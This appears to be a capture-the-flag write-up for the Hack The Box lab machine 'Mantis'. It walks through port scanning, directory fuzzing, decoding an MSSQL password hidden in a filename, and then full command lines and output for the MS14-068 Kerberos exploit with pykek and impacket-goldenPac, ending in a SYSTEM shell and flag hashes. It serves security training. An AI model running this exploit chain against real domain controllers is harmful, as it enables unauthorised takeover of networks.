Mantis

Foothold

Nmap Results

┌──[Sun Nov  6 02:49:21 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/home/pentester/Documents/PenetrationTesting/oscp]
└──# rscan $ip                                        
rustscan --accessible -u 5000 -b 2500 -a 10.129.228.181 -- -Pn -A

PORT      STATE SERVICE      REASON          VERSION
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-11-06 20:52:43Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1337/tcp  open  http         syn-ack ttl 127 Microsoft IIS httpd 7.5
1433/tcp  open  ms-sql-s     syn-ack ttl 127 Microsoft SQL Server 2014 12.00.2000.00; RTM
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
8080/tcp  open  http         syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-title: Tossed Salad - Blog

Viewing The Landing Page Appears To Be a Default IIS Server, However, On An Unusual Port

┌──[Sun Nov  6 05:13:36 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/home/pentester/Documents/PenetrationTesting]
└──# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$ip:1337/FUZZ/ -fc 404

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.228.181:1337/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

secure_notes            [Status: 200, Size: 477, Words: 41, Lines: 3, Duration: 70ms]

Viewing The secure_notes Directory Reveals Interesting Files. One With An Interesting Name

The Dev Notes Tells Me That The An SQL User is admin

I Decided To Further Look Into The Dev Notes Filename As It Looks Like A Base64 String.

┌──[Sun Nov  6 05:24:47 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/home/pentester/Documents/PenetrationTesting]
└──# echo 'NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx' | base64 -d                                                                                 130 ⨯
6d2424716c5f53405f504073735730726421

Decoding The String Shows Which Appears To Be Now A Hex String Revealing A Password

┌──[Sun Nov  6 05:24:57 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/home/pentester/Documents/PenetrationTesting]
└──# hURL 6d2424716c5f53405f504073735730726421 -x

Original HEX      :: 6d2424716c5f53405f504073735730726421
ASCII/RAW DEcoded :: m$$ql_S@_P@ssW0rd!

Using The Credentials admin:m$$ql_S@_P@ssW0rd! I Proceed to connect to mssql service using dbeaver

Connected To MSSQL

Privilege Escalation

Navigating to an interesting table in the orcharddb reveals james's password

With James's password I look up the SID for his user

┌──[Sun Nov  6 08:11:31 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/usr/share/windows-kernel-exploits/MS14-068/pykek]
└──# rpcclient $ip -U james                                                                                                                              130 ⨯
Password for [WORKGROUP\james]:
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

I then proceed to create a privileged ticket granting ticket

┌──[Sun Nov  6 08:12:58 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/usr/share/windows-kernel-exploits/MS14-068/pykek]
└──# python2 ./ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d $ip -s S-1-5-21-4220043660-4019079961-2895681657-1103
  [+] Building AS-REQ for 10.129.14.169... Done!
  [+] Sending AS-REQ to 10.129.14.169... Done!
  [+] Receiving AS-REP from 10.129.14.169... Done!
  [+] Parsing AS-REP from 10.129.14.169... Done!
  [+] Building TGS-REQ for 10.129.14.169... Done!
  [+] Sending TGS-REQ to 10.129.14.169... Done!
  [+] Receiving TGS-REP from 10.129.14.169... Done!
  [+] Parsing TGS-REP from 10.129.14.169... Done!
  [+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!

With impacket's goldenpac tool I supply james credentials and gain system access

┌──[Sun Nov  6 08:13:07 PM CST 2022]-[wlan0:192.168.1.153 tun0:10.10.16.2]-[TheScriptKid]-[/usr/share/windows-kernel-exploits/MS14-068/pykek]
└──# impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis.htb.local -w /tmp/krb5cc_0             
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file xCmOVFBQ.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service Llrq on mantis.htb.local.....
[*] Starting service Llrq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

User Proof

C:\Users\james\Desktop>hostname && whoami && type user.txt && ipconfig /all
mantis
nt authority\system
96f7c833a5c34d01f16b7bd18339a748

Windows IP Configuration

   Host Name . . . . . . . . . . . . : mantis
   Primary Dns Suffix  . . . . . . . : htb.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : htb.local
                                       .htb

Ethernet adapter Local Area Connection 4:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter #3
   Physical Address. . . . . . . . . : 00-50-56-B9-EC-F6
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::7857:89df:b5b7:7226(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::7857:89df:b5b7:7226%18(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.129.14.169(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Sunday, November 06, 2022 8:55:16 PM
   Lease Expires . . . . . . . . . . : Sunday, November 06, 2022 11:25:15 PM
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%18
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DNS Servers . . . . . . . . . . . : 1.1.1.1
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\Users\james\Desktop>

user.txt

Root Proof

C:\Users\Administrator\Desktop>hostname && whoami && type root.txt && ipconfig /all
mantis
nt authority\system
bf685a04a54ed3ac1cb065f28917487d

Windows IP Configuration

   Host Name . . . . . . . . . . . . : mantis
   Primary Dns Suffix  . . . . . . . : htb.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : htb.local
                                       .htb

Ethernet adapter Local Area Connection 4:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter #3
   Physical Address. . . . . . . . . : 00-50-56-B9-EC-F6
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::7857:89df:b5b7:7226(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::7857:89df:b5b7:7226%18(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.129.14.169(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Sunday, November 06, 2022 8:55:16 PM
   Lease Expires . . . . . . . . . . : Sunday, November 06, 2022 11:25:15 PM
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%18
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DNS Servers . . . . . . . . . . . : 1.1.1.1
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\Users\Administrator\Desktop>

root.txt

Badge